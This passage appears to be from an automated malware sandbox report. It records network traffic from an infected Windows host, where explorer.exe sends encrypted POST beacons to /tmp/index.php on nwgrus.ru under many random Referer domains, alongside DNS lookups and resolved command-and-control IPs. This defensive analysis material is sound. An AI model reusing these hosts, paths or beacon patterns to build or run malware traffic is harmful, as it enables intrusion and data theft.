                                                                                                                                      Oct 8, 2024 03:17:34.688594103 CEST4435006523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:34.688604116 CEST50065443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:34.688607931 CEST4435006523.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:37.704230070 CEST5006680192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:37.709774017 CEST8050066201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:37.709852934 CEST5006680192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:37.710000992 CEST5006680192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:37.710035086 CEST5006680192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:37.714900970 CEST8050066201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:37.714931011 CEST8050066201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:38.839585066 CEST8050066201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:38.839687109 CEST8050066201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:38.839751005 CEST5006680192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:38.839998007 CEST5006680192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:38.845041037 CEST8050066201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:51.239928007 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.240014076 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:51.240080118 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.240350008 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.240382910 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:51.832901955 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:51.833117008 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.833997965 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.834021091 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:51.834602118 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:51.835235119 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.835274935 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:51.835494995 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:52.198797941 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:52.198945045 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:52.199021101 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:52.199141026 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:52.199183941 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:52.199208975 CEST50067443192.168.2.423.145.40.168
                                                                                                                                      Oct 8, 2024 03:17:52.199223995 CEST4435006723.145.40.168192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:55.120667934 CEST5006880192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:55.125875950 CEST8050068201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:55.126094103 CEST5006880192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:55.126094103 CEST5006880192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:55.126184940 CEST5006880192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:55.131198883 CEST8050068201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:55.131253004 CEST8050068201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:56.256889105 CEST8050068201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:56.256937027 CEST8050068201.103.8.135192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:56.257177114 CEST5006880192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:56.262687922 CEST5006880192.168.2.4201.103.8.135
                                                                                                                                      Oct 8, 2024 03:17:56.267676115 CEST8050068201.103.8.135192.168.2.4

                                                                                                                                      UDP Packets

                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      Oct 8, 2024 03:14:18.512068033 CEST6463553192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:14:19.514327049 CEST6463553192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:14:20.524640083 CEST6463553192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST53646351.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST53646351.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST53646351.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:15:18.569936037 CEST5999353192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:15:18.582319975 CEST53599931.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:16:58.926079988 CEST6290853192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:16:59.930843115 CEST6290853192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:17:00.946425915 CEST6290853192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST53629081.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST53629081.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST53629081.1.1.1192.168.2.4
                                                                                                                                      Oct 8, 2024 03:18:03.310151100 CEST6074653192.168.2.41.1.1.1
                                                                                                                                      Oct 8, 2024 03:18:03.325584888 CEST53607461.1.1.1192.168.2.4

                                                                                                                                      DNS Queries

                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Oct 8, 2024 03:14:18.512068033 CEST192.168.2.41.1.1.10xdfd5Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:19.514327049 CEST192.168.2.41.1.1.10xdfd5Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.524640083 CEST192.168.2.41.1.1.10xdfd5Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:15:18.569936037 CEST192.168.2.41.1.1.10x9293Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:16:58.926079988 CEST192.168.2.41.1.1.10x7da8Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:16:59.930843115 CEST192.168.2.41.1.1.10x7da8Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:00.946425915 CEST192.168.2.41.1.1.10x7da8Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:18:03.310151100 CEST192.168.2.41.1.1.10xbfa6Standard query (0)globalviewsnature.comA (IP address)IN (0x0001)false

                                                                                                                                      DNS Answers

                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Oct 8, 2024 03:14:12.590634108 CEST1.1.1.1192.168.2.40x2e4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:12.590634108 CEST1.1.1.1192.168.2.40x2e4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:13.098494053 CEST1.1.1.1192.168.2.40x34ddNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:13.098494053 CEST1.1.1.1192.168.2.40x34ddNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790242910 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790278912 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru125.7.253.10A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru190.146.112.188A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru105.197.97.247A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:20.790297985 CEST1.1.1.1192.168.2.40xdfd5No error (0)nwgrus.ru183.100.39.16A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:53.975908995 CEST1.1.1.1192.168.2.40xc212No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:14:53.975908995 CEST1.1.1.1192.168.2.40xc212No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:15:18.582319975 CEST1.1.1.1192.168.2.40x9293No error (0)ninjahallnews.com23.145.40.168A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161866903 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161910057 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru201.103.8.135A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru196.189.156.245A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru211.171.233.129A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru177.129.90.106A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru187.204.9.111A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru190.156.239.49A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru186.123.165.48A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru180.75.11.133A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:17:01.161937952 CEST1.1.1.1192.168.2.40x7da8No error (0)nwgrus.ru58.151.148.90A (IP address)IN (0x0001)false
                                                                                                                                      Oct 8, 2024 03:18:03.325584888 CEST1.1.1.1192.168.2.40xbfa6No error (0)globalviewsnature.com23.145.40.113A (IP address)IN (0x0001)false

                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                      • 23.145.40.164
                                                                                                                                      • https:
                                                                                                                                        • ninjahallnews.com
                                                                                                                                      • arlhmhxchhgqep.com
                                                                                                                                        • nwgrus.ru
                                                                                                                                      • tdpshksrvfora.org
                                                                                                                                      • uhxuuwgfmyhe.com
                                                                                                                                      • hkuvmvjfakdhd.com
                                                                                                                                      • gspricnhwajrk.com
                                                                                                                                      • ihkjhoeohsucndfk.org
                                                                                                                                      • lpitxyhvwvj.net
                                                                                                                                      • yltrrjxrgdt.net
                                                                                                                                      • jypectwcaivky.com
                                                                                                                                      • uvanlbvtcqkc.org
                                                                                                                                      • jkgktqvsjdwb.com
                                                                                                                                      • cxrauupqkavo.org
                                                                                                                                      • fmrccqvtujxqbxpg.com
                                                                                                                                      • keeemaaxcllp.org
                                                                                                                                      • iwmxjihevykqvbos.net
                                                                                                                                      • lxadwtocjtceer.com
                                                                                                                                      • hvtgqqwlcbupjdi.org
                                                                                                                                      • cestfyhpiwlpo.org
                                                                                                                                      • qocskrvscrey.org
                                                                                                                                      • tcqfwxekwxifmk.net
                                                                                                                                      • qhndxwhkmipxgbaj.org
                                                                                                                                      • awkedsxfgif.org
                                                                                                                                      • xnrwcbelwfy.com
                                                                                                                                      • hidbwvhnrpsqtckd.org
                                                                                                                                      • kldixuwrvoj.org
                                                                                                                                      • jrduoddrbbwoyfog.org
                                                                                                                                      • fadawnjwyvdbowke.net
                                                                                                                                      • ejoaxqvdwaljnps.org
                                                                                                                                      • qmmqfrtscgkdrbea.com
                                                                                                                                      • kcwpxhfqrcwcynne.com
                                                                                                                                      • ksfanihxkdmgc.net
                                                                                                                                      • gshbntjmlxbreay.net
                                                                                                                                      • mqkcxjfgdkafebli.net
                                                                                                                                      • pvrcqmbcktsc.com
                                                                                                                                      • gvwiwavaujycn.com
                                                                                                                                      • anqkqcglkprylr.org
                                                                                                                                      • lbnjhrckmixdmp.org
                                                                                                                                      • jwckdfwbqxcvipv.org
                                                                                                                                      • qeoeefjxuhhhbrbu.net
                                                                                                                                      • xxxghskpkjdphcpk.com

                                                                                                                                      HTTP Packets

                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.449736180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:20.830836058 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://arlhmhxchhgqep.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 336
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:20.830836058 CEST336OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 46 32 be bc
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA .[k,vuF2oL~{Lzmyr/ulRKBi66=F@TG*X3~(E!dHFH3X$zCQ!|d^I4@;
                                                                                                                                      Oct 8, 2024 03:14:22.194552898 CEST152INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:21 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 04 00 00 00 72 e8 87 ec
                                                                                                                                      Data Ascii: r


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449737180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:22.204900980 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://tdpshksrvfora.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 333
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:22.204952955 CEST333OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 66 05 cc a5
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vufpDhD/7=0S ~$E(*nR2CQ`31?05$'&o4XKNG w2$`/]"CD
                                                                                                                                      Oct 8, 2024 03:14:23.607597113 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:23 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449738180.75.11.133802580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Oct 8, 2024 03:14:23.615633965 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: http://uhxuuwgfmyhe.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 163
                                                                                                                                      Host: nwgrus.ru
                                                                                                                                      Oct 8, 2024 03:14:23.615633965 CEST163OUTData Raw: 3b 6e 21 17 f6 bb 60 23 ab db c5 00 0f 70 7d ce 0a 7e ba 93 1f 00 95 60 0a 7a 7f 9c 37 b7 b4 6f 92 59 c0 58 73 68 52 1f ed 98 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 76 03 d4 ed
                                                                                                                                      Data Ascii: ;n!`#p}~`z7oYXshR? 9Yt M@NA -[k,vuvK(^|AO-BD]ru6G)KW@>5Ak1
                                                                                                                                      Oct 8, 2024 03:14:24.986113071 CEST484INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx/1.26.0
                                                                                                                                      Date: Tue, 08 Oct 2024 01:14:24 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
